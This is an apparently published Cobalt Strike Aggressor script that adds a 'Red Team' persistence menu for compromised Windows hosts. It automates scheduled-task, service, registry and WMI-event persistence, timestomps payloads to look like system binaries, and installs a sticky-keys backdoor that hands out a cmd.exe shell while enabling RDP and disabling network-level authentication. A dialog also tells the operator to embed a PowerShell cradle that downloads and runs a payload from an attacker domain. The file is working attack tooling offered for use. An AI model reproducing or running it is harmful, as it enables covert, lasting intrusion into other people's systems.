237 lines
11 KiB
Plaintext
237 lines
11 KiB
Plaintext
#Persistence Menu
|
|
#Author: @Qu1nn
|
|
#Beacon menu for common methods used for Persistence
|
|
|
|
popup beacon_top {
|
|
menu "&Red Team"{
|
|
#Persistence Menu
|
|
menu "&Persistence" {
|
|
item "&Schtasks Persistence" {
|
|
local('$bid');
|
|
foreach $bid ($1) {
|
|
persistUserSchtasks($bid);
|
|
}
|
|
}
|
|
item "&Service EXE Persistence" {
|
|
local('$bid');
|
|
foreach $bid ($1) {
|
|
if (-isadmin $bid) {
|
|
persistCustomService($bid);
|
|
}
|
|
else {
|
|
berror($1, "\c4Persistence Requires Admin Level Privileges");
|
|
}
|
|
}
|
|
}
|
|
item "&Registry Persistence" {
|
|
local('$bid');
|
|
foreach $bid ($1) {
|
|
persistRegistry($bid);
|
|
}
|
|
}
|
|
item "&WMI Event using PowerPick" {
|
|
local('$bid');
|
|
foreach $bid ($1) {
|
|
if (-isadmin $bid) {
|
|
persistwmievent($bid);
|
|
}
|
|
else {
|
|
berror($1, "\c4Persistence Requires Admin Level Privileges");
|
|
}
|
|
}
|
|
}
|
|
item "&WMI Event Persistence using WMIC" {
|
|
local('$bid');
|
|
foreach $bid ($1) {
|
|
if (-isadmin $bid) {
|
|
persistwmieventwmic($bid);
|
|
}
|
|
else {
|
|
berror($1, "\c4Persistence Requires Admin Level Privileges");
|
|
}
|
|
}
|
|
}
|
|
item "&Stickykeys(OSK) BackDoor Persistence (Need RDP Open)" {
|
|
local('$bid');
|
|
foreach $bid ($1) {
|
|
stickykeys($bid);
|
|
}
|
|
}
|
|
item "&Windows Startup Persistence"{
|
|
local('$bid');
|
|
foreach $bid ($1) {
|
|
persistThroughStartUpFolder($bid);
|
|
}
|
|
}
|
|
}
|
|
}
|
|
}
|
|
|
|
|
|
#User Schtasks Persistence
|
|
#Author: @Qu1nn
|
|
#Runs as current user for the selected beacon
|
|
#Meant for quick user level persistence upon initial access
|
|
#Thanks to @noone and bluescreenofjeff for help
|
|
|
|
sub persistUserSchtasks {
|
|
$bid = $1;
|
|
$dialog = dialog("User Schtasks Persistence", %(taskname => "Evil Task Name..", targetpath => "Target Path..", user => "User to Run as..", schedule => "Schedule modifier..", payloadfile => "Select DLL Payload.."), lambda({
|
|
if ("$3['taskname']" ismatch 'Evil Task Name..' || "$3['targetpath']" ismatch 'Target Path..' || "$3['payloadfile']" ismatch 'Select DLL Payload..' || "$3['user']" ismatch 'User to Run as..' || "$3['schedule']" ismatch 'Schedule modifier..') {
|
|
berror($bid, "\c4Please enter a valid Task Name, Target Path, and a valid Payload File.");
|
|
break;
|
|
}
|
|
else {
|
|
bcd($bid, $3['targetpath']);
|
|
bupload($bid, $3['payloadfile']);
|
|
bshell($bid, 'schtasks /create /tn "'.$3['taskname'].'" /tr "C:\Windows\System32\rundll32.exe '.$3['targetpath']."\\".split("/",$3['payloadfile'])[-1].',StartW" /ru "'.$3['user'].'" /sc "'.$3['schedule'].'"');
|
|
bshell($bid, 'schtasks /query /v /tn "'.$3['taskname'].'" /FO list');
|
|
}
|
|
}));
|
|
|
|
dialog_description($dialog, "User Schtasks Persistence - Generates a schtask for persistence on selected beacon.");
|
|
|
|
drow_text($dialog, "taskname", "Schtasks Taskname:");
|
|
drow_text($dialog, "user", "User to Run as:");
|
|
drow_text($dialog, "targetpath", "Target Path:");
|
|
drow_text($dialog, "schedule", "Schedule Modifier:");
|
|
drow_file($dialog, "payloadfile", "DLL Payload:");
|
|
|
|
dbutton_action($dialog, "Create");
|
|
dialog_show($dialog);
|
|
|
|
}
|
|
|
|
#Admin Level Custom Service EXE Persistence
|
|
#Author: @Qu1nn
|
|
#Runs as elevated user/SYSTEM for the selected beacon
|
|
|
|
sub persistCustomService {
|
|
$bid = $1;
|
|
$dialog = dialog("Admin Level Custom Service EXE Persistence", %(servicename => "Custom Service Name..", display => "Display Name for Custom Service..", description => "Description for Custom Service..", targetpath => "Target Path..", payloadfile => "Select Payload.."), lambda({
|
|
if ("$3['servicename']" ismatch 'Custom Service Name..' || "$3['targetpath']" ismatch 'Target Path..' || "$3['display']" ismatch 'Display Name for Custom Service..' || "$3['description']" ismatch 'Description for Custom Service..' || "$3['payloadfile']" ismatch 'Select Payload..') {
|
|
berror($bid, "\c4Please enter a valid Custom Service Name, Target Path, Display Name, Description and Payload File.");
|
|
break;
|
|
}
|
|
else {
|
|
bcd($bid, $3['targetpath']);
|
|
bupload($bid, $3['payloadfile']);
|
|
btimestomp($bid, "$3['payloadfile']", "C:\\Windows\\System32\\cmd.exe");
|
|
bshell($bid, 'sc delete '.$3['servicename'].'');
|
|
bshell($bid, 'sc create '.$3['servicename'].' binpath= "'.$3['targetpath']."\\".split("/",$3['payloadfile'])[-1].'" error= ignore start= auto DisplayName= "'.$3['display'].'"');
|
|
bshell($bid, 'sc description '.$3['servicename'].' "'.$3['description'].'"');
|
|
bshell($bid, 'sc start '.$3['servicename'].'');
|
|
}
|
|
}));
|
|
dialog_description($dialog, "Generates a Custom Service for Admin Level persistence on selected beacon. **Only Service EXE Payloads should be used**");
|
|
|
|
drow_text($dialog, "servicename", "Custom Service Name:");
|
|
drow_text($dialog, "display", "Display Name for Custom Service:");
|
|
drow_text($dialog, "description", "Description for Custom Service:");
|
|
drow_text($dialog, "targetpath", "Target/Bin Path:");
|
|
drow_file($dialog, "payloadfile", "Payload:");
|
|
|
|
dbutton_action($dialog, "Create");
|
|
dialog_show($dialog);
|
|
|
|
}
|
|
|
|
#Registry Persistence
|
|
#Author: @Qu1nn
|
|
#Depending on Registry Location elevated access might be required
|
|
|
|
sub persistRegistry {
|
|
$bid = $1;
|
|
$dialog = dialog("Registry Persistence", %(reglocation => "Registry Location..", keyname => "Key Name..", datatype => "Data Type..(REG_SZ)", keyvalue => "Key Value..(Payload)"), lambda({
|
|
if ("$3['reglocation']" ismatch 'Registry Location..' || "$3['keyname']" ismatch 'Key Name..' || "$3['datatype']" ismatch 'Data Type..(REG_SZ)' || "$3['keyvalue']" ismatch 'Key Value..(Payload)') {
|
|
berror($bid, "\c4Please enter a valid Registry Location, Key Name, Key Type, and a valid Payload Location.");
|
|
break;
|
|
}
|
|
else {
|
|
bshell($bid, 'reg add "'.$3['reglocation'].'" /v "'.$3['keyname'].'" /t "'.$3['datatype'].'" /d "'.$3['keyvalue'].'" /f');
|
|
bshell($bid, 'reg query "'.$3['reglocation'].'"');
|
|
}
|
|
}));
|
|
|
|
dialog_description($dialog, "Registry Persistence - Creates a custom Registry Entry for persistence on selected beacon. **HKLM\\ could require elevated access.");
|
|
|
|
drow_text($dialog, "reglocation", "Registry Location:");
|
|
drow_text($dialog, "keyname", "Registry Key Name:");
|
|
drow_text($dialog, "datatype", "Registry Key Type:");
|
|
drow_text($dialog, "keyvalue", "Registry Key Value..(Payload Location):");
|
|
|
|
dbutton_action($dialog, "Create");
|
|
dialog_show($dialog);
|
|
|
|
}
|
|
|
|
#Permanent WMI Event using WMIC Persistence
|
|
#Author: @Qu1nn
|
|
#Generates a Custom WMI Event using WMIC for SYSTEM Level persistence on selected beacon
|
|
#Very syntax heavy, Test first before using on live targets
|
|
|
|
sub persistwmieventwmic {
|
|
$bid = $1;
|
|
$dialog = dialog("Permanent WMI Event using WMIC Persistence", %(eventfilter => "__EventFilter Name..", eventquery => "Event Query...(Win32 Classes)", eventconsumer => "CommandLineEventConsumer Name..(Must be different from __EventFilter Name)", commandline => "CommandLineTemplate Syntax..(powershell.exe -w hidden -enc)", payloadfile => "Encoded Payload String.."), lambda({
|
|
if ("$3['eventfilter']" ismatch '__EventFilter Name..' || "$3['eventquery']" ismatch 'Event Query...(Win32 Classes)' || "$3['eventconsumer']" ismatch 'CommandLineEventConsumer Name..(Must be different from __EventFilter Name)' || "$3['commandline']" ismatch 'CommandLineTemplate Syntax..(powershell.exe -w hidden)' || "$3['payloadfile']" ismatch 'Select Encoded Payload..') {
|
|
berror($bid, "\c4Please enter a valid Custom __EventFilter Name, Event Query, CommandLineEventConsumer Name, Command Line Options, and the Encoded Payload File.");
|
|
break;
|
|
}
|
|
else {
|
|
bshell($bid, 'wmic /NAMESPACE:"\\\root\subscription" PATH __EventFilter CREATE Name="'.$3['eventfilter'].'", EventNameSpace="root\cimv2", QueryLanguage="WQL", Query="'.$3['eventquery'].'"');
|
|
bshell($bid, 'wmic /NAMESPACE:"\\\root\subscription" PATH CommandLineEventConsumer CREATE Name="'.$3['eventconsumer'].'", CommandLineTemplate="'.$3['commandline']." ".split("/",$3['payloadfile'])[-1].'"');
|
|
bshell($bid, 'wmic /NAMESPACE:"\\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"'.$3['eventfilter'].'\"", Consumer="CommandLineEventConsumer.Name=\"'.$3['eventconsumer'].'\""');
|
|
bshell($bid, 'wmic /NAMESPACE:"\\\root\subscription" PATH __EventFilter GET __RELPATH /FORMAT:list');
|
|
bshell($bid, 'wmic /NAMESPACE:"\\\root\subscription" PATH CommandLineEventConsumer GET __RELPATH /FORMAT:list');
|
|
bshell($bid, 'wmic /NAMESPACE:"\\\root\subscription" PATH __FilterToConsumerBinding GET __RELPATH /FORMAT:list');
|
|
}
|
|
}));
|
|
dialog_description($dialog, "Generates a Custom WMI Event using WMIC for SYSTEM Level persistence on selected beacon. **Syntax is heavy, Test before using on live targets. Encoded Payload must include IEX ((new-object new.webclient).downloadstring(http://yourdomain/payload.txt)) Utilize the following command to encode the payload correctly: cat payload.txt | iconv --to-code=UTF-16LE | base64** ");
|
|
|
|
#base 64 encode IEX of the powershell one liner
|
|
#cat payload.txt | iconv --to-code=UTF-16LE | base64
|
|
|
|
drow_text($dialog, "eventfilter", "Custom __EventFilter Name:");
|
|
drow_text($dialog, "eventquery", "Custom Event Query:");
|
|
drow_text($dialog, "eventconsumer", "Custom CommandLineEventConsumer Name:");
|
|
drow_text($dialog, "commandline", "Custom Command Line Options:");
|
|
drow_text($dialog, "payloadfile", "Custom Encoded Payload String:");
|
|
|
|
dbutton_action($dialog, "Create");
|
|
dialog_show($dialog);
|
|
|
|
}
|
|
|
|
sub stickykeys {
|
|
|
|
bshell($1, 'REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f');
|
|
bshell($1, 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v Debugger /t REG_SZ /d "c:\windows\system32\cmd.exe"');
|
|
bshell($1, 'REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d "0" /f');
|
|
bshell($1, 'netsh firewall set service type = remotedesktop mode = enable');
|
|
bshell($1, 'netsh advfirewall firewall set rule group="remote desktop" new enable=Yes');
|
|
bshell($1, 'net start TermService');
|
|
|
|
}
|
|
|
|
sub persistThroughStartUpFolder {
|
|
$bid = $1;
|
|
$dialog = dialog("Start Up Folder Persistence", %(startup => "Startup Directory Folder..", payload => "Select Payload.."), lambda({
|
|
if ("$3['startup']" ismatch 'Startup Directory Folder..' || "$3['payload']" ismatch 'Select Payload..') {
|
|
berror($bid, "\c4Please enter a valid Startup Directory Folder, and select a Payload")
|
|
break;
|
|
}
|
|
else {
|
|
bshell($bid, 'cd "'.$3['startup'].'"');
|
|
bupload($bid, $3['payload']);
|
|
btimestomp($bid, "$3['payload']", "c:\\windows\\system32\\calc.exe");
|
|
}
|
|
}));
|
|
dialog_description($dialog, "Start Up Folder Persistence - Generates a Startup Folder Entry and places a payload inside that folder. **Windows NT 6.0-10.0/All Users Location - %SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup | Windows NT 6.0-10.0/Current User Location %SystemDrive%\Users\%UserName%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup");
|
|
|
|
drow_text($dialog, "startup", "StartUp Directory Folder Location:");
|
|
drow_text($dialog, "payload", "Select Payload:");
|
|
|
|
dbutton_action($dialog, "Create");
|
|
dialog_show($dialog);
|
|
}
|